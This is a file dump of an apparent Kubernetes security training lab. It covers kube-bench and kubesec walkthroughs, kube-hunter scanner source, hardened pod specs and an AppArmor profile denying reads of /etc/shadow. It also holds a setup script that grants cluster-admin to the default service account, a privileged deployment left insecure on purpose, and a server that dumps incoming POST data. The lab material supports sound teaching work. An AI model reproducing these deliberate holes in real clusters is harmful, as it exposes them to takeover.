 1 | #!/usr/bin/env bash
 2 | 
 3 | kubeadm init --pod-network-cidr=10.244.0.0/16 --apiserver-advertise-address $(curl -XGET https://www.canihazip.com/s)
 4 | mkdir -p $HOME/.kube
 5 | cp /etc/kubernetes/admin.conf $HOME/.kube/config
 6 | chown $(id -u):$(id -g) $HOME/.kube/config
 7 | kubectl apply -f https://raw.githubusercontent.com/coreos/flannel/master/Documentation/kube-flannel.yml
 8 | kubectl apply -f https://raw.githubusercontent.com/coreos/flannel/master/Documentation/k8s-manifests/kube-flannel-rbac.yml
 9 | kubectl taint nodes --all node-role.kubernetes.io/master-
10 | sleep 5
11 | kubectl create clusterrolebinding badboy --clusterrole cluster-admin --serviceaccount=default:default
12 | echo "kubernetes initialized in insecure mode..."
13 | 


--------------------------------------------------------------------------------
/Kubernetes/K8s-Cluster-Attack/tornado_server.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import tornado.ioloop
 4 | import tornado.web
 5 | import pprint
 6 | 
 7 | 
 8 | class MyDumpHandler(tornado.web.RequestHandler):
 9 |     def post(self):
10 |         pprint.pprint(self.request)
11 |         pprint.pprint(self.request.body)
12 | 
13 | if __name__ == "__main__":
14 |     tornado.web.Application([(r"/.*", MyDumpHandler),]).listen(9090)
15 |     tornado.ioloop.IOLoop.instance().start()
16 | 
17 | 


--------------------------------------------------------------------------------
/Kubernetes/Kube-Bench/README.md:
--------------------------------------------------------------------------------
 1 | # K8s CIS Benchmark - Kube-bench
 2 | 
 3 | 
 4 | ##### Step 1: 
 5 | 
 6 | * Navigate to the `Kube-Bench` directory
 7 | 
 8 | ```bash
 9 | cd /root/container_training/Kubernetes/Kube-Bench
10 | ```
11 | 
12 | 
13 | ##### Step 2: 
14 | 
15 | * To get a list of available commands and options, run the following command
16 | 
17 | ```bash
18 | ./kube-bench --help
19 | ```
20 | 
21 | 
22 | ##### Step 3: 
23 | 
24 | * To run CIS benchmark scan, run
25 | 
26 | ```bash
27 | ./kube-bench master
28 | ```
29 | 
30 | 
31 | ##### Step 4: 
32 | 
33 | * To save results to a `json` file, run the following command
34 | 
35 | If a `.json` report is necessary, run 
36 | 
37 | ```bash
38 | ./kube-bench --json master > report.json
39 | ```
40 | 


--------------------------------------------------------------------------------
/Kubernetes/Kube-Bench/cfg/1.8/config.yaml:
--------------------------------------------------------------------------------
 1 | ---
 2 | ## Controls Files. 
 3 | # These are YAML files that hold all the details for running checks.
 4 | #
 5 | ## Uncomment to use different control file paths.
 6 | # masterControls: ./cfg/master.yaml
 7 | # nodeControls: ./cfg/node.yaml
 8 | # federatedControls: ./cfg/federated.yaml
 9 | 
10 | master:
11 |   apiserver:
12 |     confs:
13 |       - /etc/kubernetes/manifests/kube-apiserver.yaml
14 |       - /etc/kubernetes/manifests/kube-apiserver.manifest
15 |     defaultconf: /etc/kubernetes/manifests/kube-apiserver.yaml
16 | 
17 |   scheduler:
18 |     confs: 
19 |       - /etc/kubernetes/manifests/kube-scheduler.yaml
20 |       - /etc/kubernetes/manifests/kube-scheduler.manifest
21 |     defaultconf: /etc/kubernetes/manifests/kube-scheduler.yaml
22 | 
23 |   controllermanager:
24 |     confs:
25 |       - /etc/kubernetes/manifests/kube-controller-manager.yaml
26 |       - /etc/kubernetes/manifests/kube-controller-manager.manifest
27 |     defaultconf: /etc/kubernetes/manifests/kube-controller-manager.yaml
28 | 
29 |   etcd:
30 |     confs:
31 |       - /etc/kubernetes/manifests/etcd.yaml
32 |       - /etc/kubernetes/manifests/etcd.manifest
33 |     defaultconf: /etc/kubernetes/manifests/etcd.yaml
34 | 
35 | node:
36 |   kubelet:
37 |     confs:
38 |      - /etc/systemd/system/kubelet.service.d/10-kubeadm.conf
39 |     defaultconf: /etc/systemd/system/kubelet.service.d/10-kubeadm.conf
40 |   
41 |   proxy:
42 |     confs:
43 |       - /etc/kubernetes/addons/kube-proxy-daemonset.yaml
44 |     defaultconf: /etc/kubernetes/addons/kube-proxy-daemonset.yaml
45 | 


--------------------------------------------------------------------------------
/Kubernetes/Kube-Bench/img/kube-bench-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Bench/img/kube-bench-1.png


--------------------------------------------------------------------------------
/Kubernetes/Kube-Bench/img/kube-bench-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Bench/img/kube-bench-2.png


--------------------------------------------------------------------------------
/Kubernetes/Kube-Bench/img/kube-bench-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Bench/img/kube-bench-3.png


--------------------------------------------------------------------------------
/Kubernetes/Kube-Bench/img/kube-bench-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Bench/img/kube-bench-4.png


--------------------------------------------------------------------------------
/Kubernetes/Kube-Bench/kube-bench:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Bench/kube-bench


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/README.md:
--------------------------------------------------------------------------------
 1 | # Scanning K8s Cluster - Kubehunter
 2 | 
 3 | 
 4 | 
 5 | ##### Step 1: 
 6 | 
 7 | 
 8 | * Navigate to the `Kube-Hunter` directory that has `kubehunter.py` file.
 9 | 
10 | ```bash
11 | cd /root/container_training/Kubernetes/Kube-Hunter
12 | ```
13 | 
14 | 
15 | ##### Step 2: 
16 | 
17 | * To get a list of arguments available, run
18 | 
19 | ```bash
20 | ./kube-hunter.py --help
21 | ```
22 | 
23 | 
24 | ##### Step 3: 
25 | 
26 | * To get list of all passive and active scans, run the following command
27 | 
28 | ```bash
29 | ./kube-hunter.py --active --list
30 | ```
31 | 
32 | 
33 | ##### Step 4: 
34 | 
35 | * Start a passive scan with kube-hunter on the server
36 | 
37 | ###### * Note: Server IP can be fetched by running `serverip` on the provisioned server.
38 | 
39 | 
40 | ```bash
41 | serverip
42 | 
43 | ./kube-hunter.py
44 | ```
45 | 
46 | 
47 | ##### Step 5: 
48 | 
49 | * Select `option 1` to run a scan on the kubernetes instance deployed on the server and enter the Server IP
50 | 


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Hunter/__init__.py


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/img/kube-hunter-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Hunter/img/kube-hunter-1.png


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/img/kube-hunter-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Hunter/img/kube-hunter-2.png


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/img/kube-hunter-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Hunter/img/kube-hunter-3.png


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/img/kube-hunter-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Hunter/img/kube-hunter-4.png


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/img/kube-hunter-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Hunter/img/kube-hunter-5.png


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/plugins/README.md:
--------------------------------------------------------------------------------
 1 | # Plugins
 2 | 
 3 | This folder contains modules that will load before any parsing of arguments by kubehunter's main module  
 4 | 
 5 | An example for using a plugin to add an argument:
 6 | ```python
 7 | # example.py
 8 | from __main__ import parser
 9 | 
10 | parser.add_argument('--exampleflag', action="store_true", help="enables active hunting")
11 | ```
12 | What we did here was just add a file to the `plugins/` folder, import the parser, and adding an argument.
13 | 
14 | All plugins in this folder gets imported right after the main arguments are added, and right before they are getting parsed, so you can add an argument that will later be used in your [hunting/discovery module](../src/README.md).
15 | 


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/plugins/__init__.py:
--------------------------------------------------------------------------------
1 | from os.path import dirname, basename, isfile
2 | import glob
3 | 
4 | # dynamically importing all modules in folder
5 | files = glob.glob(dirname(__file__)+"/*.py")
6 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')):
7 |     exec('from {} import *'.format(module_name))


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/requirements.txt:
--------------------------------------------------------------------------------
1 | netaddr
2 | netifaces
3 | enum34
4 | scapy
5 | requests
6 | PrettyTable
7 | urllib3
8 | ruamel.yaml
9 | 


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/src/__init__.py:
--------------------------------------------------------------------------------
1 | import core
2 | import modules


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/src/core/__init__.py:
--------------------------------------------------------------------------------
1 | import types
2 | import events


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/src/core/events/__init__.py:
--------------------------------------------------------------------------------
1 | from handler import *
2 | import types


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/src/core/events/types/__init__.py:
--------------------------------------------------------------------------------
 1 | from os.path import dirname, basename, isfile
 2 | import glob
 3 | 
 4 | from common import *
 5 | 
 6 | # dynamically importing all modules in folder
 7 | files = glob.glob(dirname(__file__)+"/*.py")
 8 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')):
 9 |     if module_name != "handler":
10 |         exec('from {} import *'.format(module_name))


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/src/core/types.py:
--------------------------------------------------------------------------------
 1 | class ActiveHunter(object):    
 2 |     def publish_event(self, event):
 3 |         handler.publish_event(event, caller=self)
 4 | 
 5 | 
 6 | class Hunter(object):
 7 |     def publish_event(self, event):
 8 |         handler.publish_event(event, caller=self)
 9 | 
10 | 
11 | """Kubernetes Components"""
12 | class KubernetesCluster():
13 |     """Kubernetes Cluster"""
14 |     name = "Kubernetes Cluster"
15 | 
16 | class Kubelet(KubernetesCluster):
17 |     """The kubelet is the primary "node agent" that runs on each node"""
18 |     name = "Kubelet"
19 | 
20 | 
21 | """ Categories """
22 | class InformationDisclosure(object):
23 |     name = "Information Disclosure"
24 | 
25 | class RemoteCodeExec(object):
26 |     name = "Remote Code Execution"
27 | 
28 | class IdentityTheft(object):
29 |     name = "Identity Theft"
30 | 
31 | class UnauthenticatedAccess(object):
32 |     name = "Unauthenticated Access"
33 | 
34 | class AccessRisk(object):
35 |     name = "Access Risk"
36 | 
37 | 
38 | from events import handler # import is in the bottom to break import loops


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/src/modules/__init__.py:
--------------------------------------------------------------------------------
1 | import report
2 | import discovery
3 | import hunting


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/src/modules/discovery/__init__.py:
--------------------------------------------------------------------------------
1 | from os.path import dirname, basename, isfile
2 | import glob
3 | 
4 | # dynamically importing all modules in folder
5 | files = glob.glob(dirname(__file__)+"/*.py")
6 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')):
7 |     exec('from {} import *'.format(module_name))


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/src/modules/discovery/apiserver.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | 
 3 | from ...core.types import Hunter
 4 | from ...core.events import handler
 5 | from ...core.events.types import OpenPortEvent, Service, Event
 6 | 
 7 | class ReadOnlyKubeletEvent(Service, Event):
 8 |     """The read-only port on the kubelet serves health probing endpoints, and is relied upon by many kubernetes componenets"""
 9 |     def __init__(self):
10 |         Service.__init__(self, name="Kubelet API (readonly)")
11 | 
12 | 
13 | class ApiServer(Service, Event):
14 |     """The API server is in charge of all operations on the cluster."""
15 |     def __init__(self):
16 |         Service.__init__(self, name="API Server")
17 | 
18 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 443 or x.port == 6443)
19 | class ApiServerDiscovery(Hunter):
20 |     """Api Server Discovery
21 |     Checks for the existence of a an Api Server
22 |     """
23 |     def __init__(self, event):
24 |         self.event = event
25 | 
26 |     def execute(self):
27 |         main_request = requests.get("https://{}:{}".format(self.event.host, self.event.port), verify=False).text
28 |         if "code" in main_request:
29 |             self.event.role = "Master"
30 |         self.publish_event(ApiServer())
31 | 


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/src/modules/discovery/dashboard.py:
--------------------------------------------------------------------------------
 1 | import json
 2 | 
 3 | import requests
 4 | 
 5 | from ...core.events import handler
 6 | from ...core.events.types import Event, OpenPortEvent, Service
 7 | from ...core.types import Hunter
 8 | 
 9 | 
10 | class KubeDashboardEvent(Service, Event):
11 |     """A web-based Kubernetes user interface. allows easy usage with operations on the cluster"""
12 |     def __init__(self, **kargs):
13 |         Service.__init__(self, name="Kubernetes Dashboard", **kargs)     
14 | 
15 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 30000)
16 | class KubeDashboard(Hunter):
17 |     """K8s Dashboard Discovery
18 |     Checks for the existence of a Dashboard
19 |     """
20 |     def __init__(self, event):
21 |         self.event = event
22 | 
23 |     @property
24 |     def secure(self):
25 |         r = requests.get("http://{}:{}/api/v1/service/default".format(self.event.host, self.event.port))
26 |         if "listMeta" in r.text and len(json.loads(r.text)["errors"]) == 0:
27 |             return False
28 |         return True
29 | 
30 |     def execute(self):
31 |         if not self.secure:
32 |             self.publish_event(KubeDashboardEvent())
33 | 


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/src/modules/discovery/ports.py:
--------------------------------------------------------------------------------
 1 | import logging
 2 | 
 3 | from socket import socket
 4 | from ...core.types import Hunter
 5 | 
 6 | from ...core.events import handler
 7 | from ...core.events.types import NewHostEvent, OpenPortEvent
 8 | 
 9 | 
10 | default_ports = [8001, 10250, 10255, 30000, 443, 6443]
11 | 
12 | @handler.subscribe(NewHostEvent)
13 | class PortDiscovery(Hunter):
14 |     """Port Scanning
15 |     Scans Kubernetes known ports to determine open endpoints for discovery
16 |     """
17 |     def __init__(self, event):
18 |         self.event = event
19 |         self.host = event.host
20 |         self.port = event.port
21 | 
22 |     def execute(self):
23 |         logging.debug("host {0} try ports {1}".format(self.host, default_ports))
24 |         for single_port in default_ports:
25 |             if self.test_connection(self.host, single_port):
26 |                 self.publish_event(OpenPortEvent(port=single_port))
27 | 
28 |     @staticmethod
29 |     def test_connection(host, port):
30 |         s = socket()
31 |         s.settimeout(1.5)
32 |         try: 
33 |             success = s.connect_ex((str(host), port))
34 |             if success == 0:
35 |                 return True
36 |         except: pass
37 |         finally: s.close()
38 |         return False
39 | 


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/src/modules/discovery/proxy.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from ...core.types import Hunter
 3 | 
 4 | from ...core.events import handler
 5 | from ...core.events.types import Service, Event, OpenPortEvent
 6 | 
 7 | class KubeProxyEvent(Event, Service):
 8 |     """proxies from a localhost address to the Kubernetes apiserver"""
 9 |     def __init__(self):
10 |         Service.__init__(self, name="Kubernetes Proxy") 
11 | 
12 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 8001)
13 | class KubeProxy(Hunter):
14 |     """Proxy Discovery
15 |     Checks for the existence of a an open Proxy service
16 |     """
17 |     def __init__(self, event):
18 |         self.event = event
19 |         self.host = event.host
20 |         self.port = event.port or 8001
21 | 
22 |     @property
23 |     def accesible(self):
24 |         r = requests.get("http://{host}:{port}/api/v1".format(host=self.host, port=self.port))
25 |         if r.status_code == 200 and "APIResourceList" in r.text:
26 |             return True
27 | 
28 |     def execute(self):
29 |         if self.accesible:
30 |             self.publish_event(KubeProxyEvent())        
31 | 


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/src/modules/hunting/__init__.py:
--------------------------------------------------------------------------------
1 | from os.path import dirname, basename, isfile
2 | import glob
3 | 
4 | # dynamically importing all modules in folder
5 | files = glob.glob(dirname(__file__)+"/*.py")
6 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')):
7 |     exec('from {} import *'.format(module_name))


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/src/modules/hunting/certificates.py:
--------------------------------------------------------------------------------
 1 | from ...core.types import Hunter, KubernetesCluster, InformationDisclosure
 2 | from ...core.events import handler
 3 | from ...core.events.types import Vulnerability, Event, Service
 4 | 
 5 | import ssl
 6 | import base64
 7 | import re
 8 | 
 9 | email_pattern = re.compile(r"([a-z0-9]+@[a-z0-9]+\.[a-z0-9]+)")
10 | 
11 | class CertificateEmail(Vulnerability, Event):
12 |     """Certificate includes an email address"""
13 |     def __init__(self, email):
14 |         Vulnerability.__init__(self, KubernetesCluster, "Certificate Includes Email Address", category=InformationDisclosure)
15 |         self.email = email
16 |         self.evidence = "email: {}".format(self.email)
17 | 
18 | @handler.subscribe(Service)
19 | class CertificateDiscovery(Hunter):
20 |     """Certificate Email Hunting
21 |     Checks for email addresses in kuberntes ssl certificates
22 |     """
23 |     def __init__(self, event):
24 |         self.event = event
25 | 
26 |     def execute(self):
27 |         try:
28 |             addr = (str(self.event.host), self.event.port)
29 |             cert = ssl.get_server_certificate(addr)
30 |         except ssl.SSLError as e:
31 |             # If the server doesn't offer SSL on this port we won't get a certificate
32 |             return
33 |         c = cert.strip(ssl.PEM_HEADER).strip(ssl.PEM_FOOTER)
34 |         certdata = base64.decodestring(c)
35 |         emails = re.findall(email_pattern, certdata)
36 |         for email in emails:
37 |             self.publish_event( CertificateEmail(email=email) )


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/src/modules/hunting/dashboard.py:
--------------------------------------------------------------------------------
 1 | import json
 2 | from ...core.types import Hunter, RemoteCodeExec, KubernetesCluster
 3 | 
 4 | import requests
 5 | 
 6 | from ...core.events import handler
 7 | from ...core.events.types import Vulnerability, Event
 8 | from ..discovery.dashboard import KubeDashboardEvent
 9 | 
10 | class DashboardExposed(Vulnerability, Event):
11 |     """All oprations on the cluster are exposed"""
12 |     def __init__(self, nodes):
13 |         Vulnerability.__init__(self, KubernetesCluster, "Dashboard Exposed", category=RemoteCodeExec)
14 |         self.evidence = "nodes: {}".format(' '.join(nodes)) if nodes else None
15 | 
16 | @handler.subscribe(KubeDashboardEvent)
17 | class KubeDashboard(Hunter):
18 |     """Dashboard Hunting
19 |     Hunts open Dashboards, gets the type of nodes in the cluster
20 |     """
21 |     def __init__(self, event):
22 |         self.event = event
23 | 
24 |     def get_nodes(self):
25 |         r = requests.get("http://{}:{}/api/v1/node".format(self.event.host, self.event.port))
26 |         if r.status_code == 200 and "nodes" in r.text:
27 |             return list(map(lambda node: node["objectMeta"]["name"], json.loads(r.text)["nodes"]))
28 |         
29 |     def execute(self):
30 |         self.publish_event(DashboardExposed(nodes=self.get_nodes()))        


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/src/modules/report/__init__.py:
--------------------------------------------------------------------------------
1 | from os.path import dirname, basename, isfile
2 | import glob
3 | 
4 | # dynamically importing all modules in folder
5 | files = glob.glob(dirname(__file__)+"/*.py")
6 | for module_name in (basename(f)[:-3] for f in files if isfile(f) and not f.endswith('__init__.py')):
7 |     exec('from {} import *'.format(module_name))


--------------------------------------------------------------------------------
/Kubernetes/Kube-Hunter/src/modules/report/yaml.py:
--------------------------------------------------------------------------------
 1 | import StringIO
 2 | 
 3 | from ruamel.yaml import YAML
 4 | 
 5 | from collector import services, vulnerabilities
 6 | 
 7 | 
 8 | class YAMLReporter(object):
 9 |     def get_report(self):
10 |         yaml = YAML()
11 |         report = {
12 |             "nodes": self.get_nodes(),
13 |             "services": self.get_services(),
14 |             "vulnerabilities": self.get_vulenrabilities()
15 |         }
16 |         output = StringIO.StringIO()
17 |         yaml.dump(report, output)
18 |         return output.getvalue()
19 | 
20 |     def get_nodes(self):
21 |         nodes = list()
22 |         node_locations  = set()
23 |         for service in services:
24 |             node_location = str(service.host)
25 |             if node_location not in node_locations:
26 |                 nodes.append({"type": "Node/Master", "location": str(service.host)})
27 |                 node_locations.add(node_location)
28 |         return nodes
29 | 
30 |     def get_services(self):
31 |         return [{"service": service.get_name(),
32 |                  "location": "{}:{}{}".format(service.host, service.port, service.get_path()),
33 |                  "description": service.explain()}
34 |                 for service in services]
35 | 
36 |     def get_vulenrabilities(self):
37 |         return [{"location": "{}:{}".format(vuln.host, vuln.port) if vuln.host else "",
38 |                  "category": vuln.category.name,
39 |                  "vulnerability": vuln.get_name(),
40 |                  "description": vuln.explain(),
41 |                  "evidence": str(vuln.evidence)}
42 |                 for vuln in vulnerabilities]
43 | 


--------------------------------------------------------------------------------
/Kubernetes/Kube-Sec/README.md:
--------------------------------------------------------------------------------
 1 | # YAML Static Analyser - Kubesec
 2 | 
 3 | ###### Kubesec helps quantify risk for K8s resources based on the suggested best-practices. Lists of test run can be found at https://kubesec.io/basics/.
 4 | 
 5 | 
 6 | ##### Step 1: 
 7 | 
 8 | * Navigate to the `Kube-Sec` directory
 9 | 
10 | ```bash
11 | cd /root/container_training/Kubernetes/Kube-Sec
12 | ```
13 | 
14 | 
15 | ##### Step 2: 
16 | 
17 | * To analyze a Kubernetes YAML spec file, run
18 | 
19 | ```bash
20 | ./kubesec insecure_vulflask_deployment.yaml
21 | ```
22 | 
23 | 
24 | ##### Step 3:
25 | 
26 | * To save results to a file, run the following command
27 | 
28 | ```bash
29 | ./kubesec insecure_vulflask_deployment.yaml >> kubesec_result.json
30 | ```
31 | 


--------------------------------------------------------------------------------
/Kubernetes/Kube-Sec/img/kube-sec-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Sec/img/kube-sec-1.png


--------------------------------------------------------------------------------
/Kubernetes/Kube-Sec/img/kube-sec-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Kube-Sec/img/kube-sec-2.png


--------------------------------------------------------------------------------
/Kubernetes/Kube-Sec/insecure_vulflask_deployment.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: extensions/v1beta1
 2 | kind: Deployment
 3 | metadata:
 4 |   name: vul-flask
 5 | spec:
 6 |   replicas: 2
 7 |   minReadySeconds: 15
 8 |   strategy:
 9 |     type: RollingUpdate
10 |     rollingUpdate:
11 |       maxUnavailable: 1
12 |       maxSurge: 1
13 |   template:
14 |     metadata:
15 |       labels:
16 |         app: vul-flask
17 |     spec:
18 |       containers:
19 |       - image: abhaybhargav/vul_flask
20 |         imagePullPolicy: Always
21 |         name: vul-flask
22 |         ports:
23 |         - containerPort: 5050
24 |         securityContext:
25 |           # the privileged flag will be marked as a critical risk
26 |           privileged: true
27 |           readOnlyRootFilesystem: true
28 | 


--------------------------------------------------------------------------------
/Kubernetes/Kube-Sec/kubesec:
--------------------------------------------------------------------------------
1 | FILE="${1:-}";
2 | [[ ! -f "${FILE}" ]] && {
3 |     echo "kubesec: ${FILE}: No such file. Please Check file path" >&2;
4 | };
5 | curl --silent --compressed --connect-timeout 5 -F file=@"${FILE}" https://kubesec.io/
6 | 


--------------------------------------------------------------------------------
/Kubernetes/KubeAudit/insecure_vulflask_deployment.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: extensions/v1beta1
 2 | kind: Deployment
 3 | metadata:
 4 |   name: vul-flask
 5 | spec:
 6 |   replicas: 2
 7 |   minReadySeconds: 15
 8 |   strategy:
 9 |     type: RollingUpdate
10 |     rollingUpdate:
11 |       maxUnavailable: 1
12 |       maxSurge: 1
13 |   template:
14 |     metadata:
15 |       labels:
16 |         app: vul-flask
17 |     spec:
18 |       containers:
19 |       - image: abhaybhargav/vul_flask
20 |         imagePullPolicy: Always
21 |         name: vul-flask
22 |         ports:
23 |         - containerPort: 5050
24 |         securityContext:
25 |           # the privileged flag will be marked as a critical risk
26 |           privileged: true
27 |           readOnlyRootFilesystem: true
28 | 


--------------------------------------------------------------------------------
/Kubernetes/PodSecurityPolicy/k8s-vul-flask-redis-armor:
--------------------------------------------------------------------------------
 1 | #include <tunables/global>
 2 | profile k8s-vul-flask-redis-armor flags=(attach_disconnected,mediate_deleted) {
 3 |   #include <abstractions/base>
 4 |   file,
 5 |   network,
 6 |   capability,
 7 |   deny /app/** w, #deny file write to /app directory
 8 |   deny /tmp/** w, #deny file write to /tmp directory
 9 |   deny /etc/passwd rwklx, #deny all access to /etc/passwd
10 |   deny /etc/shadow rwklx, #deny all access to /etc/shadow
11 | 
12 |   #restrict access to HOME
13 | 
14 |   audit deny @{HOME}/.* mrwkl,
15 |   audit deny @{HOME}/.*/ rw,
16 |   audit deny @{HOME}/.*/** mrwkl,
17 |   audit deny @{HOME}/bin/ rw,
18 |   audit deny @{HOME}/bin/** mrwkl,
19 |   # @{HOME}/ r,
20 |   # @{HOME}/** rw,
21 | }
22 | 


--------------------------------------------------------------------------------
/Kubernetes/PodSecurityPolicy/reverseproxy.conf:
--------------------------------------------------------------------------------
 1 | server {
 2 |     listen  80;
 3 |     server_name localhost;
 4 | 
 5 |     location / {
 6 |         proxy_bind  127.0.0.1;
 7 |         proxy_pass  http://127.0.0.1:5000;
 8 |     }
 9 | 
10 |     error_page  500 502 503 504 /50x.html;
11 |     location = /50x.html {
12 |         root    /usr/share/nginx/html;
13 |     }
14 | }


--------------------------------------------------------------------------------
/Kubernetes/PodSecurityPolicy/secure-ngflask-deploy.yml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Pod
 3 | metadata:
 4 |   name: secure-ngflask-redis
 5 |   annotations:
 6 |     seccomp.security.alpha.kubernetes.io/defaultProfileName:  'docker/default'
 7 |     container.apparmor.security.beta.kubernetes.io/secure-vul-flask: 'localhost/k8s-vul-flask-redis-armor'
 8 |   labels:
 9 |     app: secure-ngflask-redis
10 | spec:
11 |   containers:
12 |     - name: nginx
13 |       image: nginx:1.11
14 |       ports:
15 |       - containerPort: 80
16 |       volumeMounts:
17 |         - mountPath: /etc/nginx/conf.d
18 |           name: config-volume
19 |     - name: redis
20 |       image: redis
21 |       ports:
22 |       - containerPort: 6379
23 |     - name: secure-vul-flask
24 |       image: abhaybhargav/secure_vul_flask
25 |       imagePullPolicy: Always
26 |       securityContext:
27 |         runAsUser: 100
28 |         runAsNonRoot: true
29 |         allowPrivilegeEscalation: false
30 |       env:
31 |         - name: REDIS_HOST
32 |           value: 127.0.0.1
33 |       ports:
34 |       - containerPort: 5000
35 |         name: vulflask-port
36 |   volumes:
37 |     - name: config-volume
38 |       configMap:
39 |         name: nginx-config


--------------------------------------------------------------------------------
/Kubernetes/Prometheus-Grafana/clusterRole.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: rbac.authorization.k8s.io/v1beta1
 2 | kind: ClusterRole
 3 | metadata:
 4 |   name: prometheus
 5 | rules:
 6 | - apiGroups: [""]
 7 |   resources:
 8 |   - nodes
 9 |   - nodes/proxy
10 |   - services
11 |   - endpoints
12 |   - pods
13 |   verbs: ["get", "list", "watch"]
14 | - apiGroups:
15 |   - extensions
16 |   resources:
17 |   - ingresses
18 |   verbs: ["get", "list", "watch"]
19 | - nonResourceURLs: ["/metrics"]
20 |   verbs: ["get"]
21 | ---
22 | apiVersion: rbac.authorization.k8s.io/v1beta1
23 | kind: ClusterRoleBinding
24 | metadata:
25 |   name: prometheus
26 | roleRef:
27 |   apiGroup: rbac.authorization.k8s.io
28 |   kind: ClusterRole
29 |   name: prometheus
30 | subjects:
31 | - kind: ServiceAccount
32 |   name: default
33 |   namespace: monitoring
34 | 


--------------------------------------------------------------------------------
/Kubernetes/Prometheus-Grafana/grafana-prometheus.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Service
 3 | metadata:
 4 |   name: grafana
 5 |   namespace: monitoring
 6 | spec:
 7 |   type: NodePort
 8 |   ports:
 9 |   - port: 3000
10 |     protocol: TCP
11 |     targetPort: 3000
12 |   selector:
13 |     app: grafana
14 | ---
15 | apiVersion: extensions/v1beta1
16 | kind: Deployment
17 | metadata:
18 |   labels:
19 |     name: grafana
20 |   name: grafana
21 |   namespace: monitoring
22 | spec:
23 |   replicas: 1
24 |   selector:
25 |     matchLabels:
26 |       name: grafana
27 |   strategy:
28 |     rollingUpdate:
29 |       maxSurge: 1
30 |       maxUnavailable: 1
31 |     type: RollingUpdate
32 |   template:
33 |     metadata:
34 |       creationTimestamp: null
35 |       labels:
36 |         name: grafana
37 |         app: grafana
38 |     spec:
39 |       containers:
40 |       - image: grafana/grafana:latest
41 |         imagePullPolicy: IfNotPresent
42 |         name: grafana
43 |         ports:
44 |         - containerPort: 3000
45 |           protocol: TCP
46 |         volumeMounts:
47 |         - mountPath: /var/lib/grafana
48 |           name: data
49 |       restartPolicy: Always
50 |       volumes:
51 |       - emptyDir: {}
52 |         name: data
53 | 


--------------------------------------------------------------------------------
